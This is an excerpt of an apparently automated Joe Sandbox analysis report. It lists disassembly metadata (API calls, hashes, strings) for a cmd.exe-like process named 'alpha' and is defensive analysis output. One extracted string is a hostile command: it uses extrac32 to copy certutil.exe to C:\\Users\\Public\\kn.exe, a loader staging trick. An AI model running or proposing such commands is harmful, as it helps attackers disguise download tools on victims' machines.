• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
• String ID: FOR$ IF
APIs
• iswdigit.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F0D6
• iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6E942E626,?,?,00000000,00007FF6E9431F69), ref: 00007FF6E942F1BA
• wcschr.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F1E7
• iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF6E942E626,?,?,00000000,00007FF6E9431F69), ref: 00007FF6E942F1FF
• iswdigit.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F2BB
Similarity
• API ID: iswdigit$iswspacewcschr
• String ID: )$=,;
Similarity
• API ID: ErrorLast$InformationVolumeiswalphatowupper
• String ID: %04X-%04X$:
Similarity
• API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
• String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
APIs
• iswdigit.MSVCRT(?,?,00000000,00007FF6E94368A3,?,?,?,?,?,?,?,00000000,?,00007FF6E94363F3), ref: 00007FF6E9436A73
• wcschr.MSVCRT(?,?,00000000,00007FF6E94368A3,?,?,?,?,?,?,?,00000000,?,00007FF6E94363F3), ref: 00007FF6E9436A91
• wcschr.MSVCRT(?,?,00000000,00007FF6E94368A3,?,?,?,?,?,?,?,00000000,?,00007FF6E94363F3), ref: 00007FF6E9436AB0
• wcschr.MSVCRT(?,?,00000000,00007FF6E94368A3,?,?,?,?,?,?,?,00000000,?,00007FF6E94363F3), ref: 00007FF6E9436AE3
• wcschr.MSVCRT(?,?,00000000,00007FF6E94368A3,?,?,?,?,?,?,?,00000000,?,00007FF6E94363F3), ref: 00007FF6E9436B01
Similarity
• API ID: wcschr$iswdigit
• String ID: +-~!$<>+-*/%()|^&=,
Similarity
• API ID: File_get_osfhandle$Pointer$BuffersFlushRead
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF6E94314D6,?,?,?,00007FF6E942AA22,?,?,?,00007FF6E942847E), ref: 00007FF6E9431673
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6E94314D6,?,?,?,00007FF6E942AA22,?,?,?,00007FF6E942847E), ref: 00007FF6E943168D
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6E94314D6,?,?,?,00007FF6E942AA22,?,?,?,00007FF6E942847E), ref: 00007FF6E9431757
• HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6E94314D6,?,?,?,00007FF6E942AA22,?,?,?,00007FF6E942847E), ref: 00007FF6E943176E
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6E94314D6,?,?,?,00007FF6E942AA22,?,?,?,00007FF6E942847E), ref: 00007FF6E9431788
• HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6E94314D6,?,?,?,00007FF6E942AA22,?,?,?,00007FF6E942847E), ref: 00007FF6E943179C
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Heap$Process$Alloc$Size
• String ID:
• API String ID: 3586862581-0
• Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
• Instruction ID: 50835d2b4bf742166f856a9015a8a62cf8b4cf7b5669938d66c86c7e25ba8232
• Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
• Instruction Fuzzy Hash: 0E916DB3A09B42C1EA14DF75A84837866A0FF48B90F598135DE5D873A4DF3EE449C30A
Similarity
• API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
• String ID:
• API String ID: 1313749407-0
• Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
• Instruction ID: 65ffbba6bddd6c846dbc08954bbfcf9ede96746683c7cd5330bc8be1b6c92710
• Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
• Instruction Fuzzy Hash: 3A519123A08682C2EB14DF3198083BDA691BF49B90F585230DD1E877D5EF3EE449C70A
Similarity
• API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
• String ID:
• API String ID: 920682188-0
• Opcode ID: 709d1c67be100917fc71fda4c7ad07296061441c4da44e249bcfadc6653ab77c
• Instruction ID: d1ed92fc0177095cab6b8cb030e8fe2958ff7c8d3bc8245e35d863f763821477
• Opcode Fuzzy Hash: 709d1c67be100917fc71fda4c7ad07296061441c4da44e249bcfadc6653ab77c
• Instruction Fuzzy Hash: 41510032605B85CAEB25DF21E8547E877A1FF88B84F048129CA4E87764EF3DD649CB05
Strings
• extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF6E942E00B
Similarity
• API ID: Heap$FreeProcess_setjmp
• String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
• API String ID: 777023205-3344945345
• Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
• Instruction ID: f92a2a3c6c57430a1ae8303b5a20e361d6e138e0228fe1d4602cb8270df4d924
• Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
• Instruction Fuzzy Hash: E55157B2E1EA42C5FB149F11A880379B6A0BF89B54F544535D90DC32A2EF3EA44DC70A
APIs
• iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6E942E626,?,?,00000000,00007FF6E9431F69), ref: 00007FF6E942F1BA
• wcschr.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F1E7
• iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF6E942E626,?,?,00000000,00007FF6E9431F69), ref: 00007FF6E942F1FF
• iswdigit.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F2BB
Similarity
• API ID: iswdigit$iswspacewcschr
• String ID: )$=,;
• API String ID: 1959970872-2167043656
• Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
• Instruction ID: 88679fe057ba9c3d19297643a3e6022470799eb108818e301c355a10f6d6573d
• Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
• Instruction Fuzzy Hash: BB4145A7E08616C6FB684F11995437926A0BF12740FD450B5C989C36A4DF3EA88DCB0E
Similarity
• API ID: _wcsnicmpfprintfwcsrchr
• String ID: CMD Internal Error %s$%s$Null environment
• API String ID: 3625580822-2781220306
• Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
• Instruction ID: 21c09efe3d40ef1412a327d92d5e3f2f2629cd210396b5a0edab7c1bd7de2f67
• Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
• Instruction Fuzzy Hash: 6D31C423A08646D2FA289F52A5003B972A0BF45F94F444534DE1D977D5EF3EE48EC70A
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memsetwcsspn
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3809306610-0
                                                                                                                                                                        • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                                                                                        • Instruction ID: 17790d24f6dd9331398309f64bc35e199fc5940d7932a007bd025a2708b69792
                                                                                                                                                                        • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                                                                                        • Instruction Fuzzy Hash: 35B17B73A08A46C2EA50DF35A45437A77A0FF84B84F848031CA4E87795DF7EE849C70A
APIs
Similarity
• API ID: wcschr$iswdigit$wcstol
• String ID:
• API String ID: 3841054028-0
• Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
• Instruction ID: cdea29b1fbcaa85e8f6961ee98ddf37bedfc108590ee400aba06ebce432cd6e7
• Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
• Instruction Fuzzy Hash: 73510567A19652C3E7249F15A8102F976A1FF68B50B448231DE5D823D4EF3EE44AC70A
APIs
• _get_osfhandle.MSVCRT ref: 00007FF6E9443687
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6E942260D), ref: 00007FF6E94436A6
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6E942260D), ref: 00007FF6E94436EB
• _get_osfhandle.MSVCRT ref: 00007FF6E9443703
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6E942260D), ref: 00007FF6E9443722
Similarity
• API ID: Console$Write_get_osfhandle$Mode
• String ID:
• API String ID: 1066134489-0
• Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
• Instruction ID: e88c57aec55ef78da04ba9b645456917f9a82f17653d9bc3f6a43ac7635f2f28
• Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
• Instruction Fuzzy Hash: C2519363B08642D7EB249F21960477AA691FF44B90F088435DE4EC7790EF3EE449CB0A
APIs
Similarity
• API ID: memset$DriveErrorInformationLastTypeVolume
• String ID:
• API String ID: 850181435-0
• Opcode ID: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
• Instruction ID: 9869fed1b54958058e6ae6fa7301d9dbe810692da2740397c7b43acf6dad0e59
• Opcode Fuzzy Hash: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
• Instruction Fuzzy Hash: 93411633608AC1CAEB618F60D8443ED77A4FF89B44F454525DA4D8BB48CF39D649C705
APIs
  • Part of subcall function 00007FF6E9433578: _get_osfhandle.MSVCRT ref: 00007FF6E9433584
  • Part of subcall function 00007FF6E9433578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E943359C
  • Part of subcall function 00007FF6E9433578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335C3
  • Part of subcall function 00007FF6E9433578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335D9
  • Part of subcall function 00007FF6E9433578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335ED
  • Part of subcall function 00007FF6E9433578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E9433602
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E9433514
• _get_osfhandle.MSVCRT ref: 00007FF6E9433522
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E9433541
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E943355E
  • Part of subcall function 00007FF6E94336EC: _get_osfhandle.MSVCRT ref: 00007FF6E9433715
  • Part of subcall function 00007FF6E94336EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6E9433770
  • Part of subcall function 00007FF6E94336EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9433791
Similarity
• API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
• String ID:
• API String ID: 4057327938-0
• Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
• Instruction ID: 52e4ca84611d64ff1dbf42b2040b49839395a22268cabb8e120f98548edcbe61
• Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
• Instruction Fuzzy Hash: CB315E23A08642C7E7659F75A40427DA6A0AF99B41F884175EE0EC3795DE2EE84CC709
APIs
Strings
Similarity
• API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
• String ID: KEYS$LIST$OFF
• API String ID: 411561164-4129271751
• Opcode ID: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
• Instruction ID: fbf71f1edc03e05445253f1ad02dafceac3b3f9c8de1e65fb3b57e9367db9e04
• Opcode Fuzzy Hash: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
• Instruction Fuzzy Hash: 28219122E08603D1F7549F65A45037922A1FF84790F909231DA1EC32E5EE3ED84DCB0A
                                                                                                                                                                        APIs
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E94301C4
                                                                                                                                                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6E943E904,?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E94301D6
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF6E943E904,?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E9430212
                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6E943E904,?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E9430228
                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF6E943E904,?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E943023C
                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6E943E904,?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E9430251
                                                                                                                                                                        Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 513048808-0
                                                                                                                                                                        • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                                                                                        • Instruction ID: f96d97bab94f2a6004ed90ecc21607ba5b2a9fe47ca1319fd6877e075c3cfc09
                                                                                                                                                                        • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                                                                                        • Instruction Fuzzy Hash: 56219A7391C682C7EB519FB0A9883386B90FF4A754F144335DA0E82690CF7EA84CC70A
                                                                                                                                                                        APIs
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9433584
                                                                                                                                                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E943359C
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335C3
                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335D9
                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335ED
                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E9433602
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 513048808-0
                                                                                                                                                                        • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                                                                        • Instruction ID: 6d89b331c714036a7180df0c3f0021553935c5f3d4206415e7aa102b74b4b422
                                                                                                                                                                        • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                                                                        • Instruction Fuzzy Hash: D1115433A08646C6E7248F74A5882786A90FF59B65F549334DD2F827D0DE3ED44CC706
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4104442557-0
                                                                                                                                                                        • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                                                                        • Instruction ID: 9378786cca3953a8bd63b0058cb05f6ae3d6f9ca2c5b407d64a02f3d10836d89
                                                                                                                                                                        • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                                                                        • Instruction Fuzzy Hash: 31112122A05B42CBEB00DFB4E8442A833A4FF59758F400A34EA6D87B54EF7DD5A9C345
                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6E94471F9
                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E944720D
                                                                                                                                                                        • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6E9447300
                                                                                                                                                                          • Part of subcall function 00007FF6E9445740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF6E94475C4,?,?,00000000,00007FF6E9446999,?,?,?,?,?,00007FF6E9438C39), ref: 00007FF6E9445744
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: OpenSemaphore$CloseErrorHandleLast
                                                                                                                                                                        • String ID: _p0$wil
                                                                                                                                                                        • API String ID: 455305043-1814513734
                                                                                                                                                                        • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                                                                                        • Instruction ID: 23c0fb8a18d3f3baddcb7c7d159e0f9b9f38ad05ac0c70edcd3aa26fd27921fb
                                                                                                                                                                        • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                                                                                        • Instruction Fuzzy Hash: B861AF73B19A42C1EF258F6598103B963A1FF84B80F544531DA0E87795EE3EE60ACB09
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                                                                                                                        • String ID: %s
                                                                                                                                                                        • API String ID: 2401724867-3043279178
                                                                                                                                                                        • Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                                                                                                                                                        • Instruction ID: 825daf9c43f2a9d7ba3b851f797017f3cec053c75ef5007fc3c7b3cec8a4f7df
                                                                                                                                                                        • Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                                                                                                                                                        • Instruction Fuzzy Hash: 4B51ADB3A08686C5EB219F21D8403F963A0FF49B94F444135DA5D8B794EF3EE459CB0A
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: iswdigit
                                                                                                                                                                        • String ID: GeToken: (%x) '%s'
                                                                                                                                                                        • API String ID: 3849470556-1994581435
                                                                                                                                                                        • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                                                                        • Instruction ID: 38e1565347d210376ff9ddeae28bee47200d3431c281a82e85d4042e67bc2b76
                                                                                                                                                                        • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                                                                        • Instruction Fuzzy Hash: 77516333A08646C5EB209F66A44837A77A0FF44B14F508435DA4DC3390EF7EE888C71A
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E9449A10
                                                                                                                                                                        • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E9449994
                                                                                                                                                                          • Part of subcall function 00007FF6E944A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6E9449A82), ref: 00007FF6E944A77A
                                                                                                                                                                          • Part of subcall function 00007FF6E944A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6E9449A82), ref: 00007FF6E944A839
                                                                                                                                                                          • Part of subcall function 00007FF6E944A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6E9449A82), ref: 00007FF6E944A850
                                                                                                                                                                        • wcsrchr.MSVCRT ref: 00007FF6E9449A62
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                                                                                                                        • String ID: %s=%s$.
                                                                                                                                                                        • API String ID: 3242694432-4275322459
                                                                                                                                                                        • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                                                                                        • Instruction ID: 6bf29e67a6c7e4cb0261faf45c953c2403d55d181a270e9c59e810d5d1644003
                                                                                                                                                                        • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                                                                                        • Instruction Fuzzy Hash: 9641C227B0C782C5EE209F61A0503B992A1BF86B90F444230DD5D977D5EE7EE44AD70A
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6E94454E6
                                                                                                                                                                        • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6E944552E
                                                                                                                                                                          • Part of subcall function 00007FF6E944758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6E9446999,?,?,?,?,?,00007FF6E9438C39), ref: 00007FF6E94475AE
                                                                                                                                                                          • Part of subcall function 00007FF6E944758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6E9446999,?,?,?,?,?,00007FF6E9438C39), ref: 00007FF6E94475C6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                                                                                                        • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                                                                                                        • API String ID: 779401067-630742106
                                                                                                                                                                        • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                                                                                        • Instruction ID: f814c774e58bc8b37f60240077ed269938ac9cf1f27fa3bbcc969c17cd45021e
                                                                                                                                                                        • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                                                                                        • Instruction Fuzzy Hash: 73516273628682C2EB159F61E4007FE6361EF84784F544031EA4DCBA55DE7ED50ECB05
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
